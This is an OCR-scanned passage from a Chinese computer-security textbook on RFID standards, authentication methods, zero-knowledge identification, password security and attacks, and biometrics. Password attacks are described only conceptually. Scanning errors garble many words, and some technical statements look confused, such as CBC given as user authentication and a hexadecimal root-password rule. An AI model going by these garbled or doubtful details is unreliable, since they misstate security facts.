13. 56MHz、27. 12MHz、433MHz、860~960MHz、2. 45GHz 和 5. 8GHz 等 。 按 照 工作 频率 
的 不 同 ,RFID 系统 集中 在 低频 、 高 频 和 超 高 频 三 个 区 域 。RFID 标准 如 下 : 
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@ ISO 14443A/B (ISO SC17/WG8) 标 准 。 超 短 距 离 智 慧 卡 (Proximity Coupling 
Smart Cards) 标 准 。 读 取 距 离 为 0~5cm 的 超 短 距离 非 接触 智慧 卡 , 如 健康 卡 。 

@ ISO 15693(ISO SC17/WG8) 标 准 。 短 距离 智慧 卡 (Vicinity Coupling Smart Cards) 
标准 ,频率 为 13. 56MHz, 读 取 距 离 为 7~15cm, 设 计 简单 让 生产 读 取 器 的 成 本 比 ISO 14443 
低 , 如 交通 卡 .门禁 卡 。 

@ ISO 18000 系列 。 读 取 的 距离 较 长 而 使 用 的 频率 介 于 860 一 930MHz 之 间 甚 至 更 
高 , 例如 ISO 18000-6 使 用 超 高 频 (Ultra High Frequency，UHF) 频 率 , 读 取 距 离 达到 1 一 
5m; 采 用 新 技术 可 达 20 一 100 多 米 , 相 对 读 取 速度 可 达 60 码 ,主要 用 于 物流 供应 链 的 管理 。 

@ EPC(Electronic Product Code) 标 准 。 频 率 为 UHF 902 一 928 MHz 或 更 高 , 设 定 5 
个 不 同等 级 (Class): 

。 Class0 只 供 读 取 (Read Only) ,简单 被 动 式 。 

。 Classl 只 写 一 次 (Write Once) ,简单 被 动 式 。 

。 Class2 重复 读 写 (Read/ Write) ,具有 可 重复 读 写 功能 的 被 动 式 标签 。 

。 Class3 内 设 感应 器 的 半 被 动 标签 ,有 重复 读 写 功 能 ,更 包含 额外 的 感应 器 ,可 侦查 温 

度 .湿度 ,动向 变化 记录 在 RFID 标签 ,内 建 电池 增加 读 取 距 离 。 

。 Class4 属于 天 线 , 是 一 种 半 被 动 标签 ,可 主动 与 其 他 标签 沟通 。 


4.5.3 身份 认证 分 类 与 方式 


数字 世界 中 ,信息 安全 所 能 提供 的 安全 方案 也 是 对 现实 生活 的 模拟 。 在 网 络 中 ,认证 是 
使 用 远程 服务 的 前 提 , 认 证 贯穿 于 网 络 服务 的 全 部 过 程 中 。 

1. 认证 分 类 

按 认证 的 安全 性 程度 分 为 弱 认 证 (包括 普通 口令 认证 ,标识 牌 , 令 牌 认证 ) 和 强 认证 (要 
求 被 认证 的 主体 提供 身份 标识 和 密 钥 、 询 问 -挑战 认证 )。 

按 认证 的 方向 分 为 单 向 认证 和 双向 认证 。 

按 参 与 方 分 为 无 可 信 第 三 方 参与 的 认证 和 可 信 第 三 方 参与 的 认证 。 

按 加 密 方式 分 为 基于 对 称 密 钥 的 认证 和 基于 公 钥 密 钥 的 认证 。 

按 认 证 的 途径 分 为 一 般 认 证 (采用 用 户 名 和 口令 识别 方式 ,最 简单 且 易于 实现 ,用 双方 
都 知道 的 信息 进行 认证 , 易 暴 露 ) .身份 识别 (利用 事物 本 身 的 属性 进行 认证 ) .事物 认证 ( 利 
用 物 主 所 拥有 的 事物 进行 认证 ) 和 网 络 认 证 。 

网 络 认证 包括 用 户 认 证 、 会 话 认 证 和 客户 认证 。 用 户 认证 是 基于 使 用 者 本 身 的 认证 ,使 
用 CBC(Cipher Block Chaining) 模 式 ( 一 种 加 密 方式 , 它 将 纯 文本 分 块 和 之 前 加 密 的 密 文 块 
进行 XOR 操作 ,初始 块 需要 初始 向 量 ) ;会 话 认证 是 对 于 用 户 访 问 服务 权限 的 认证 ;客户 认 
证 是 一 般 基于 源 地 址 而 不 是 基于 用 户 的 访问 授权 的 认证 。 

认证 与 鉴定 的 区 别 : 鉴定 是 对 事务 的 提取 与 区 分 ,认证 则 是 验证 者 对 证 明 者 的 判定 。 
例如 ,饭店 住宿 时 提供 身份 证 或 是 驾驶 证 ,军人 证 等 证 明 自 我 身份 做 法 就 是 鉴定 ;使 用 钥匙 
打开 房间 门 锁 才 能 进入 是 门 锁 对 家 庭 成 员 的 认证 。 这 就 像 在 数字 世界 中 ,使 用 用 户 名 和 
口令 。 

2. 认证 方式 

1) 使 用 认证 双方 共同 知道 的 信息 ,包括 口令 方式 和 挑战 /应 答 方式 。 
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(1) 用 户 与 口令 方式 。 最 简单 的 认证 方式 ,明文 口令 传输 最 简洁 ,但 容易 被 嗅 探 泄密 。 
保护 口令 不 被 泄密 ,可 以 在 用 户 和 认证 系统 之 间 进 行 加 密 。 单 一 加 密 形式 下 的 用 户 名 与 口 
令 传输 方式 适合 的 应 用 环境 是 用 户 终端 可 以 直接 连接 认证 系统 ,认证 数据 库 不 为 非法 用 户 
所 获得 。 认 证 数据 库 通常 情况 下 不 会 直接 存放 用 户 的 口令 ,可 以 存放 口令 的 Hash 值 或 是 
加 密 值 。 用 户 将 口令 使 用 认证 系统 的 公 钥 加 密 后 传输 给 认证 系统 ,认证 系统 对 加 密 数 据 解 
密 后 得 到 口令 ,对 此 数据 做 Hash( 或 是 加 密 ) ,将 这 一 结果 与 数据 库 中 的 值 做 比较 , 若 数 据 匹 
配 , 则 是 合法 用 户 ;和 否则 不 是 。 如 图 4. 31 所 示 , 口 令 Hash 数据 库 认证 ;如 图 4. 32 所 示 , 加 
密令 数据 库 认证 。 
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口令 存储 输入 终端 


口令 Hash 值 
| 比较 Hash 结 果 是 否 相同 


图 4.31 终端 输入 口令 的 Hash 值 与 口令 数据 库 Hash 值 比较 认证 
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图 4.32 加 密 口令 解密 后 比较 认证 
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(2) 挑战 /应 答 式 (质询 /响应 式 )。 质 询 / 响 应 是 目前 口令 认证 机 制 的 基础 ,其 原理 适用 
于 令 牌 与 智能 卡 的 认证 。 认 证 一 个 用 户 可 以 等 同 地 证 明 这 个 用 户 拥有 某 个 私 钥 , 由 于 认证 
系统 知道 用 户 的 公 钥 ,因此 可 以 选取 一 个 随机 数字 发 送 给 用 户 进行 质询 ,用 户 收 到 后 使 用 自 
己 的 私 钥 进行 加 密 , 然 后 传递 给 认证 系统 ,认证 者 使 用 用 户 的 公 钥 进行 解密 ,然后 比较 解密 
结果 是 否 等 于 随机 数字 ,如 图 4. 33 所 示 。 


质询 数据 (接受 挑战 的 随机 数字 ) 


=| 输入 终端 


计算 数据 数据 计算 
| 比较 Hash 结 果 是 否 相同 


图 4.33 挑战 应 答 式 认证 


询问 /应 答 身份 认证 的 优点 是 没有 同步 的 问题 ,一 张 认证 卡 可 以 用 来 存 取 被 不 同 认证 服 
务 器 所 保护 的 系统 ,是 最 安全 的 认证 方式 。 其 缺点 是 使 用 者 必须 操作 的 按钮 较 多 和 繁复 ,会 
产生 较 多 的 输入 失误 。 

2) 利用 认证 者 所 具有 的 物品 进行 认证 。 利 用 硬件 实现 的 认证 方式 有 安全 令 牌 .智能 
卡 。 安 全 性 要 求 较 高 的 场合 需要 使 用 硬件 物品 来 实现 认证 ,如 安全 令 牌 。 令 牌 实际 上 是 一 
个 可 以 为 每 一 次 认证 产生 不 同 认 证 值 的 小 型 电子 设备 ,易于 携带 。 

(1) 安全 令 牌 。 安 全 令 牌 通常 是 每 隔 固定 间隔 产生 一 个 脉冲 序列 的 同步 序列 发 生 器 。 
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每 隔 一 个 固定 的 时 间 间 隔 , 系 统 都 会 和 用 户 所 携带 的 令 牌 进行 认证 。 比 如 在 一 个 有 严格 安 
全 等 级 的 实验 室 ,每 个 用 户 配置 一 个 令 牌 , 当 用 户 A 使 用 系统 时 需要 进行 认证 ,但 是 ,如 果 
用 户 A 暂时 离开 或 是 有 其 他 等 级 不 同 的 用 户 到 来 的 时 候 , 都 必须 重新 进行 认证 或 是 更 改 认 
证 权限 ,避免 敏感 信息 的 泄露 。 

认证 令 牌 的 实现 有 两 种 具体 的 方式 : 时 间 令 牌 和 挑战 /应 答 式 令 牌 。 

时 间 令 牌 和 认证 服务 器 共同 拥有 一 个 相同 的 随机 种 子 , 认 证 时 双方 将 当前 时 间 和 随机 
种 子 做 加 密 或 是 Hash 运算 ,然后 由 认证 服务 器 对 这 一 结果 进行 校 验 比较 。 时 间 令 牌 的 实 
现 非常 复杂 ,对 时 间 进 行 校 验 必 须 保 证 令 牌 与 认证 服务 器 的 时 间 同 步 。 

挑战 应 答 令 牌 是 由 认证 系统 产生 一 个 随机 数 , 令 牌 和 认证 系统 使 用 同样 的 密 钥 对 这 个 
数字 进行 加 密 或 是 Hash 变换 ,然后 进行 校 验 。 

(2) 智能 卡 。 使 用 物理 卡 来 认证 用 户 , 必 须 提 供 一 个 个 人 标识 号 (Personal Identification 
Number,PIN) ,保证 只 有 经 过 授权 的 人 才能 使 用 。 智 能 卡 中 可 以 存储 用 户 的 私 钥 、 登 录 信 
息 和 用 于 不 同 目的 的 公 钥 证 书 , 如 数字 签名 证 书 和 数据 加 密 证 书 等 ,提供 抗 修改 能 力 。 智 能 
卡 提供 了 一 种 非常 安全 的 方式 来 进行 用 户 认证 交互 式 登录 .代码 签名 和 安全 E-mail 传送 
等 。 访 问 不 但 需要 PIN ,也 需要 使 用 物理 智能 卡 和 读 取 器 。 使 用 智能 卡 比 使 用 口令 进行 认 
证 具有 更 高 的 安全 性 。 

但 是 ,硬件 器 件 认 证 的 安全 问题 的 最 大 隐患 在 于 其 本 身 有 可 能 丢失 ,因此 一 般 通过 口令 
对 其 加 以 保护 。 用 户 从 持 有 认证 执照 的 可 信 发 行者 手 里 取得 智能 卡 , 智 能 卡 的 读 取 器 成 为 
用 户 接 入 和 认证 安全 解决 方案 的 一 个 关键 部 分 。 

3) 双 要 素 认 证 。 认 证 时 考虑 使 用 验证 者 的 某 个 属性 或 是 共 知 信息 ,如 果 单 独 使 用 某 个 
方面 无 法 体现 安全 的 要 求 ,就 考虑 使 用 验证 者 的 多 个 信息 来 实现 。 比 如 较为 机 密 的 地 方 使 
用 锁 和 钥匙 进入 ,而 又 当心 钥匙 有 可 能 丢失 ,就 同时 配置 一 个 密码 锁 加 以 保证 。 这 种 方式 称 
为 双 要 素 认证 。 例 如 通过 有 口令 的 令 牌 . 智 能 卡 和 卡 的 PIN 码 等 方式 来 增强 纯 软 件 认证 方 
案 的 安全 性 。 

4) 双向 认证 。 相 对 单 向 认证 而 言 , 单 向 认证 是 默认 通信 方 A 对 B 的 检验 。 而 双向 认 
证 是 在 通信 中 需要 相互 验证 通信 的 对 方 ,这 种 双方 互相 进行 验证 的 方式 称 为 双向 认证 。 

5) 可 信 第 三 方 认证 。 利 用 KDC 或 CA 作为 可 信 第 三 方 实现 认证 。 首 先 KDC 有 一 个 
存放 所 有 用 户 密 钥 的 数据 库 。 任 何在 KDC 注册 的 用 户 A 都 可 以 与 KDC 进行 安全 通信 。 
用 户 A 和 KDC 可 以 互相 认证 ,并 在 通信 过 程 中 实施 加 密 , 因 为 双方 都 知道 用 户 A 的 密 钥 。 

KDC 存在 的 问题 是 KDC 拥有 可 以 冒充 任何 用 户 身份 的 信息 ;KDC 是 安全 问题 的 焦 
点 ;KDC 可 能 成 为 通信 的 瓶颈 。CA 与 KDC 相 比 较 ,CA 不 需要 在 线 ,所 以 更 加 安全 ,CA 的 
公开 证 书 不 会 对 安全 性 造成 任何 危害 ,不 用 担心 CA 被 入 侵 而 解密 其 他 用 户 的 通信 内 容 。 
但 CA 有 证 书 撤销 问题 。 

4.5.4 身份 识别 协议 

身份 识别 协议 也 称 为 认证 协议 ,可 以 是 单 向 或 是 双向 的 。 单 向 认证 协议 (One-way 

Authentication Protocol) 是 通信 的 一 方 认证 另 一 方 的 身份 ,比如 服务 器 在 提供 客户 申请 的 


服务 之 前 , 先 要 认证 客户 是 否 是 这 项 服务 的 合法 用 户 , 但 是 不 需要 向 用 户 证 明 自 己 的 身份 。 
双向 认证 协议 (Mutual Authentication Protocol) 是 最 常用 的 协议 , 它 使 得 通信 双方 互相 认 
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证 对 方 的 身份 。 

一 个 安全 的 身份 识别 协议 至 少 应 满足 以 下 两 个 条 件 : 识别 者 A 能 向 验证 者 B 证 明 他 
的 确 是 A; 在 识别 者 A 向 验证 者 BB 证明 他 的 身份 后 ,验证 者 B 没有 获得 任何 有 用 的 信息 ,B 
不 能 模仿 A 向 第 三 方 证 明 他 是 A。 按 照 使 用 的 密码 技术 可 以 分 为 基于 对 称 密码 的 认证 协 
议和 基于 公 钥 密码 的 认证 协议 。 

身份 识别 协议 利用 询问 -应 答 和 零 知 识 证 明 技术 。 询 问 - 应 答 是 指 验 证 者 提出 问题 ( 通 
常 是 随机 选择 一 些 随机 数 , 称 作 口令 ), 由 识别 者 回答 ,然后 验证 者 验证 其 真实 性 。 零 知识 证 
明 是 基于 知识 的 证 明 。 

1. 零 知识 证 明 (Zero Knowledge Proof) 

所 谓 零 知识 是 指 身 为 示 证 者 试图 使 验证 者 相信 某 个 论断 是 正确 的 , 却 又 不 向 验证 者 提 
供 任何 有 用 的 信息 , 即 提供 零 知识 。 

基于 零 知识 的 证 明 就 是 示 证 者 P 使 用 某 种 有 效 的 方法 (包括 数学 方法 ) ,使 得 验证 者 V 
相信 了 掌握 这 一 信息 , 却 不 泄露 任何 有 用 的 信息 。 

零 知识 证 明 问 题 源 于 最 小 泄露 证 明 (Minimum Disclosure Proof) 。 最 小 泄露 知识 证 明 
应 该 满足 条 件 : 

(1) 示 证 者 P 几乎 不 可 能 欺骗 验证 者 V, 若 P 知道 证 明 , 则 可 使 V 几乎 确信 P 知道 证 
明 ; 若 P 不 知道 证 明 , 则 可 使 V 相信 他 知道 证 明 的 概率 几 近 于 0。 

(2) 验证 者 V 几乎 不 可 能 得 到 证 明 的 信息 ,特别 是 他 不 可 能 向 其 他 人 出 示 此 证 明 。 

而 零 知 识 证 明 除 了 以 上 最 小 泄露 知识 证 明 的 两 个 条 件 外 ,还 要 满足 : 验证 者 从 示 证 者 
那里 得 不 到 任何 有 关 证 明 的 知识 。 

Quisquater 等 人 给 出 了 一 个 解释 零 知 识 证 明 的 通俗 例子 , 即 零 知识 洞穴 。 如 图 4. 34 所 
示 , 图 中 的 山洞 里 C.D 两 点 之 间 有 一 扇 上 锁 的 密 门 ,P 知道 打开 密 门 的 咒语 ,按照 下 面 的 协 
议 P 就 可 以 向 V 证明 他 知道 咒语 ,但 是 不 需要 告诉 V 网 
咒语 的 内 容 。 “| 

(1) V 站 在 A 点 ; B 

(2) P 进入 洞 中 任 一 点 C 或 Di 

(3) P 进 入 洞 中 之 后 ,V 走 到 B 点， 

(4) V 叫 P 从 左边 (或 右边 ) 出 来 ; 

(5) P 按 照 V 的 要 求实 现 (因为 P 知道 该 咒语 ); 

(6) P 和 V 重复 执行 上 面 的 过 程 n 次 。 

协议 分 析 : 如 果 P 知道 吕 语 ,他 一 定 可 以 按照 V 
的 要 求 正确 地 走出 山洞 a 次 。 如 果 P 不 知道 咒语 并 想 使 V 相信 他 知道 咒语 ,就 必须 每 次 都 
事先 猜 对 V 会 要 求 他 从 哪 一 边 出 来 , 猜 对 一 次 的 概率 是 0. 5, 猜 对 n 次 的 概率 就 是 0. 5", 当 
n 足够 大 时 ,这 个 概率 接近 于 0。 因 此 ,山洞 问题 满足 零 知 识 证 明 的 所 有 条 件 , 是 一 个 完全 的 
零 知识 证 明 协 议 。 

如 果 将 关于 零 知识 洞穴 的 协议 中 P 掌握 的 咒语 换 为 一 个 数学 难题 ,而 P 知道 如 何 解 这 
个 难题 ,就 可 以 设计 实用 的 零 知识 证 明 协议 。 

2. 分 割 和 选择 协议 (Cut and Choose) 

这 是 公平 分 享 东西 时 的 经 典 协议 : 


G D 
图 4.34 零 知识 洞穴 
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(1) P 将 东西 切 成 两 半 ; 

(2) V 选择 其 中 之 一 ; 

(3) P 拿 剩 下 的 一 半 。 

协议 分 析 : P 为 了 自己 的 利益 在 切 的 时 候 要 力求 公平 分 割 , 因 为 接 下 来 是 由 V 先 选择 
要 哪 部 分 。 


4.5.5 认证 的 口令 机 制 


用 户 名 /口令 认证 技术 是 最 简单 .最 普遍 的 身份 识别 技术 。 口 令 具有 共享 秘密 的 属性 ， 
是 相互 约定 的 代码 ,只 有 用 户 和 系统 知道 。 

1. 安全 口令 的 生成 

口令 (通行 字 ) 一 般 是 由 数字 ,字母 .特殊 字符 和 控制 字符 等 组 成 的 字符 串 。 选 择 规则 
为 : 易 记 ,难以 被 别人 猜 中 或 发 现 , 抗 分 析 能 力 强 ,还 需要 考虑 它 的 选择 方法 、 使 用 期 .长度 、 
分 配 .存储 和 管理 等 。 口 令 的 生成 有 时 由 用 户 选择 ,有 时 由 系统 分 配 。 口 令 有 多 种 ,如 一 次 
性 口令 ,还 有 基于 时 间 的 口令 。 

UNIX 系统 口令 密码 都 是 用 8 位 (新 的 是 13 位 )DES 算法 进行 加 密 的 , 即 有 效 密码 只 有 
前 8 位 ,所 以 一 味 靠 密码 的 长 度 是 不 可 以 的 。 

安全 口令 的 要 求 是 : 位 数 之 6 位 ;大 小 写字 母 混合 ;字母 与 数字 混合 ;口令 有 字母 .数字 
以 外 的 符号 ;为 保证 安全 性 ,口令 应 当 经 常 更 换 ; 为 避免 对 口令 的 字典 攻击 ,口令 应 当 保 证 一 
定 的 长 度 ; 为 避免 猿 中 ,应 尽量 采用 随机 的 字符 ,但 缺点 是 难于 记忆 。 

不 安全 口令 有 如 下 几 种 情况 : 使 用 5 位 或 5 位 以 下 的 字符 作为 口令 ;使 用 用 户 名 ( 账 
号 ) 作 为 口令 ;使 用 用 户 名 (账号 ) 的 变换 形式 作为 口令 ;将 用 户 名 颠倒 或 者 加 前 后 缀 作为 口 
令 ( 比 如 说 用 户 名 是 fool, 口 令 使 用 fool\fool123、loof、loof123 等 变换 方法 ) ;使 用 自己 或 者 
亲友 的 生日 作为 口令 (这 种 口令 很 脆弱 ,实际 可 能 的 表达 方式 和 种 类 很 有 限 ); 使 用 常用 的 英 
文 单词 作为 口令 ( 比 前 几 种 方法 要 安全 一 些 ,但 一 般 英 文 的 口令 单词 几乎 都 收集 在 黑客 的 字 
典 库 里 ) 。 

口令 安全 性 的 检验 方法 有 反应 法 和 支持 法 。 

反应 法 检验 是 利用 一 个 特定 程序 ,让 被 检测 口令 与 一 批 易 于 猜 中 的 口令 表 中 成 员 逐 个 
进行 比较 , 若 不 相符 则 通过 。 例 如 ComNet 软件 的 反应 口令 检验 程序 大 约 可 以 猜 出 近 1/2 
的 口令 ,OPUS 是 美国 Purdue 大 学 研制 的 口令 分 析 选 择 软件 。 反 应 法 检验 口令 安全 性 的 缺 
陷 是 检验 口令 很 费时 ,而且 可 猜 性 的 现 用 口令 直到 检验 后 用 户 才 会 更 换 。 

支持 法 检验 是 用 户 先 自行 选 一 个 口令 , 当 用 户 第 一 次 使 用 时 ,系统 利用 一 个 程序 检验 其 
安全 性 ,如 果 它 是 易于 猜 中 的 , 则 拒绝 并 请 用 户 重新 选 一 个 新 的 。 通 过 易 猜 中 的 口令 会 影响 
系统 的 安全 性 。 程 序 通 过 准则 要 考虑 可 猜 中 性 与 安全 性 之 间 的 折 中 ,算法 若 太 严格 , 则 造成 
所 选用 口令 屡 遭 拒绝 而 招致 用 户 抱怨 。 

2. 口令 的 存储 
口令 的 存储 不 仅 是 为 了 备 忘 ,更 重要 的 是 系统 要 在 检测 用 户口 令 时 进行 比 对 。 口令 存 
储 的 方式 有 直接 明文 存储 和 加 密 存储 两 种 。 直 接 明文 存储 是 将 口令 直接 写 在 纸 上 或 将 明文 
存储 在 文件 或 数据 库 中 ,最 容易 泄密 ;加 密 存储 的 口令 加 解密 密 钥 只 有 系统 管理 员 才 知道 。 
令 存储 在 存储 卡 中 作为 一 种 持 证 (Token) ,包括 磁卡 和 智能 卡 。 磁 卡 记录 有 用 于 机 
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器 识别 的 个 人 信息 ,通常 和 个 人 识别 号 (PIN) 一 起 使 用 ,易于 制造 和 仿制 。 智 能 卡带 有 智能 
化 的 微 处 理 器 和 存储 器 ,甚至 能 随机 动态 产生 密码 ,如 ePass、UsbKey、IC 卡 和 ID 卡 等 。 

3. 口令 认证 

通常 情况 下 的 口令 认证 是 用 户 先 输入 某 种 标志 信息 ,比如 用 户 名 和 ID 号 ,然后 系统 询 
问 用 户口 令 , 若 口令 与 用 户 文件 中 的 相 匹配 ,用 户 即 可 进入 系统 访问 。 例 如 各 类 系统 的 登录 
等 ,用 户 把 他 的 用 户 名 和 口令 送 交 服务 器 ,服务 器 系统 鉴别 该 用 户 。 

口令 使 用 Hash 杂凑 存储 方式 时 ,用 杂凑 函数 为 口令 产生 一 个 Hash“ 指 纹 ”, 当 用 户 登 
录 时 输入 口令 后 ,系统 计算 输入 口令 的 杂凑 码 ,并 与 存储 的 杂凑 值 比 对 ,成 功 则 允许 登录 ;和 否 
则 拒绝 。 

简单 和 安全 是 互相 矛盾 的 两 个 因素 。 口 令 机 制 的 缺点 是 : 

(1) 口令 安全 性 仅仅 基于 用 户口 令 的 保密 性 ,而 用 户口 令 一 般 较 短 且 容易 猜测 ,因此 这 
种 方案 不 能 抵御 口令 猜测 攻击 。 

(2) 大 多 数 系统 的 口令 是 明文 传送 到 验证 服务 器 的 ,容易 被 截获 。 

(3) 口令 维护 的 成 本 较 高 ,如 果 数 量 众多 、 更 换 频繁 ,难以 记忆 和 管理 。 

(4) 口令 容易 在 输入 的 时 候 被 攻击 者 偷窥 ,而 且 用 户 无 法 及 时 发 现 。 

4. 口令 攻击 的 方法 

用 户口 令 保管 不 利 ,容易 被 他 人 资 取 。 由 于 计算 机 只 认 口 令 不 认 和 人 ,被 次 用 户 的 信息 在 
系统 中 将 丧失 安全 保障 ,并 且 危 及 他 人 信息 安全 。 

(1) 自然 攻击 。 包 括 口 令 猜测 、 宕 探 ,. 盗 取 利用 社会 工程 骗取 等 方法 。 

攻击 者 猿 中 口令 的 概率 公式 为 P=L，R/S, 其 中 工 是 口令 生命 周期 ,R 是 攻击 者 单位 
时 间 内 猜测 不 同 口令 次 数 ,S 是 所 有 可 能 口令 的 数目 。 

窥探 是 攻击 者 利用 与 被 攻击 系统 接近 的 机 会 ,用 眼睛 目击 或 监视 器 成 像 合 法 用 户 输入 
口令 的 过 程 , 以 得 到 口令 。 

利用 社会 工程 ,攻击 者 冒充 受信 任 者 要 求 用 户主 动 交 出 口令 (包括 已 知 账号 ) ,是 最 有 效 
的 口令 攻击 方式 。 

(2) 技术 攻击 。 攻 击 者 利用 计算 机 技术 进行 口令 攻击 ,包括 口令 破解 ,字典 攻击 、 穷 举 
尝试 ,网 络 窃听 和 嗅 探 ,截取 / 重 放 等 方法 。 

口令 破解 是 指 攻击 者 通过 获取 口令 存储 文件 进行 破解 攻击 ;字典 攻击 是 将 输入 口令 与 
存储 口令 的 字典 进行 匹配 搜索 查找 ,是 否 存 在 于 字典 中 ; 穷 举 尝试 (Brute Force) 是 一 种 使 
用 字符 串 的 全 集 作 为 字典 的 特殊 字典 攻击 ,如 果 用 户 的 密码 较 短 , 很 容易 被 穷 举 出 来 ;网 络 
窃听 和 嗅 探 指 攻击 者 通过 窃听 和 嗅 探 网 络 数据 ,很 容易 分 辨 出 某 种 特定 系统 在 网 络 上 传输 
的 明文 口令 ,并 提取 出 用 户 名 和 口令 ;对 于 加 密 口 令 使 用 截取 / 重 放 (Record/Replay) 方 式 ， 
对 截取 的 密 文 进行 分 析 得 到 认证 密码 口令 ,或 采用 离线 方式 对 口令 密 文 实施 字典 攻击 。 例 
如 Raleigh 等 人 的 Crack 软件 利用 网 络 服务 器 分 析 口 令 。 

5. 口令 安全 的 应 对 措施 

口令 安全 对 于 拥有 者 要 求 : 

(1) 妥善 保管 ,最 好 加 密 存储 (最 好 不 要 写 在 纸 上 ) ,不 要 轻易 告诉 他 人 ; 

(2) 谨慎 使 用 ,输入 时 遮挡 视线 , 防 偷 宇和 摄像 

(3) 定期 更 换 口令 或 提高 更 换 的 频率 ,减少 口令 使 用 寿命 ; 


179 


《计算 机 系统 安全 》 和 和 匡 3 


(4) 增加 可 能 口令 的 数目 ,保存 口令 历史 记录 ,最 好 不 循环 使 用 旧 口 令 ; 

(5) 控制 口令 的 安全 强度 (长 度 、 字 母 数 字 混 合 、 大 小 写 、 其 他 字符 )。 

对 于 认证 系统 要 求 : 

(1) 用 户 输入 的 口令 不 明文 显示 ; 

(2) 降低 猜 中 概率 ,禁止 使 用 缺 省 口令 ,限制 单位 时 间 内 猜测 尝试 口令 的 次 数 ; 

(3) 系统 自动 生成 .分 配 口令 ,有 一 定 的 安全 测试 ; 

(4) 封锁 睡眠 用 户 ,对 长 期 未 联机 用 户 .口令 超过 使 用 期 限 或 失效 的 用 户 ID 封锁 ,直到 
用 户 重新 被 授权 ; 

(5) 选择 很 难 破译 的 加 密 算法 加 密 存储 ,增加 破解 难度 ,用 口令 破解 程序 测试 口令 的 安 
全 强度 ; 

(6) 传输 口令 密 文 ( 单 向 Hash); 

(7) 使 用 双 口 令 系统 ,允许 联机 是 一 个 口令 ,允许 接触 敏感 信息 还 需要 另外 一 个 口令 ; 

(8) 保护 根 口令 , 根 (Root) 口 令 一 般 是 系统 管理 员 使 用 ,权限 远大 于 一 般 用 户 , 要 求 必 
须 采 用 十 六 进 制 字符 串 ,不 能 通过 网 络 传送 ,要 经 常 更 换 等 ; 

(9) 一 次 性 口令 (One Time Password，OTP) ,在 登录 过 程 中 加 入 不 确定 因素 ,使 每 次 
登录 过 程 中 传送 的 信息 都 不 相同 ,以 对 付 重 放 攻 击 ; 

(10) 挫 杂 口令 ,口令 程序 取 一 个 12 位 的 随机 数 ( 通 过 读 取 实时 时 钟 , 叫 作 salt) 并 附 在 
用 户 输 入 的 口令 后 面 形成 复合 串 , 加 密 该 串 连 同 salt 随机 数 一 起 存 人 口令 文件 ; 

(11) 使 用 同步 的 随机 口令 ,声称 者 与 验证 者 两 端 共同 拥有 一 串 随机 口令 ,在 该 串 的 某 
一 位 置 保持 同步 ,两 端 共同 使 用 一 个 随机 序列 生成 器 ,在 序列 生成 器 的 初 态 保持 同步 ,或 使 
用 时 戳 维 持 两 端的 同步 时 钟 。 

口令 的 频繁 更 换 增加 了 用 户 的 负担 ,也 为 资深 入 侵 者 提供 了 条 件 ,系统 如 何 生成 易于 记 
忆 又 难以 猜 中 的 口令 是 要 解决 的 一 个 关键 问题 。 如 果 口 令 难以 记忆 , 则 用 户 要 写 下 来 ,增加 
了 暴露 的 风险 ;如 果 口 令 生 成 算法 被 窃 , 则 危及 整个 系统 的 安全 。 


4.5.6 认证 的 主体 特征 机 制 


主体 特征 一 般 指 系统 主体 的 唯一 特征 ,如 用 户 的 生物 特征 ,机 器 硬件 的 数值 指纹 (包括 
IP.MAC ,硬盘 序列 号 .CPU 序列 号 等 能 唯一 标识 硬件 主体 的 数字 序列 ) ,也 可 用 于 标识 主 
体 。 这 里 主要 讨论 用 户主 体 的 生物 特征 。 目 前 已 有 的 设备 包括 指纹 鉴别 仪 .视网膜 扫描 仪 、 
声音 验证 设备 和 手 型 识别 器 等 ,安全 性 高 。 指 纹 识别 ,视网膜 血管 分 布 图 识别 声波 纹 识别 
和 人 脸 识 别 已 是 很 多 商业 系统 采用 的 一 种 识别 方式 。 

人 体 生 物 特征 因 人 而 异 、 随 身 携带 ,不 会 丢失 且 难 以 伪造 , 极 适用 于 个 人 身份 认证 。 生 
物 特征 = 生理 特征 十 行为 特征 。 生 理 特 征 (What you are?) 与 生 俱 来 ,如 DNA、 脸 像 . 虹 膜 、 
指纹 等 ;行为 特征 (What you do?) 是 后 天 习惯 使 然 ,如 笔迹 、 步 态 等 。 常 用 生物 特征 的 比较 
如 表 4. 10 所 示 。 利 用 个 人 的 生理 特征 来 实现 认证 是 个 人 身份 认证 技术 中 最 简单 而 安全 的 
方法 。 

人 体 生 物 特 征 的 身份 识别 技术 主要 包括 手写 签名 识别 技术 指纹 识别 技术 .语音 识别 技 
术 、 视 网 膜 图 样 识别 技术 、 虹 膜 图 样 识别 技术 、 人 脸 识 别 和 基因 (DNA) 识 别 等 。 
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表 4.10 生物 特征 性 能 比较 


生物 特征 普遍 性 独特 性 稳定 性 | 可 采集 性 性 能 接受 程度 | 防 坎 骗 性 
人 脸 高 低 中 高 低 高 低 
指纹 中 高 高 下 高 中 高 
手 型 中 中 中 高 中 中 中 
虹膜 高 高 高 中 高 低 高 
视网膜 高 高 中 低 高 低 高 
签名 低 低 低 高 低 高 低 
声音 中 低 低 中 低 高 低 


1. 手写 签名 识别 技术 

传统 的 协议 和 契约 等 都 以 手写 签名 生效 ,发 生 争执 时 则 由 法 庭 判决 ,一般 都 要 经 过 专家 
鉴定 。 由 于 签名 动作 和 字迹 具有 强烈 的 个 性 而 可 作为 身份 验证 的 可 靠 依据 。 

机 器 自动 识别 手写 签名 成 为 模式 识别 中 的 重要 研究 之 一 。 进 行 机 器 识别 要 做 到 : 一 是 
签名 的 机 器 含义 ,二 是 手写 的 字迹 风格 (对 于 身份 验证 尤为 重要 )。 自 动 的 签名 系统 先 让 用 
户 书写 几 个 签名 进行 分 析 , 提 取 适 当 参 数 存档 备用 。 可 能 的 伪造 签名 有 两 种 情况 : 一 是 不 
知道 真迹 , 按 得 到 的 信息 随手 签名 ;二 是 已 知 真迹 时 模仿 签名 或 影 描 签名 。 

2. 指纹 识别 技术 

指纹 识别 技术 是 通过 取 像 设备 读 取 指纹 图 像 ,然后 用 计算 机 识别 软件 分 析 指 纹 的 全 局 
特征 和 指纹 的 局 部 特征 ,可 以 非常 可 靠 地 通过 指纹 来 确认 一 个 人 
的 身份 。 

指纹 作为 身份 验证 的 准确 而 可 靠 的 手段 ,相同 的 概率 不 到 
10 ” ,形状 不 随时 间 变 化 ,提取 方便 ,如 图 4. 35 所 示 。 将 指纹 作 
为 接 入 控制 的 手段 大 大 提高 了 其 安全 性 和 可 靠 性 。 指 纹 识别 主要 
涉及 4 个 过 程 : 读 取 指纹 图 像 、 提 取 指 纹 特征 、 保 存 数 据 和 比 对 
匹配 。 

3. 语音 识别 技术 2 

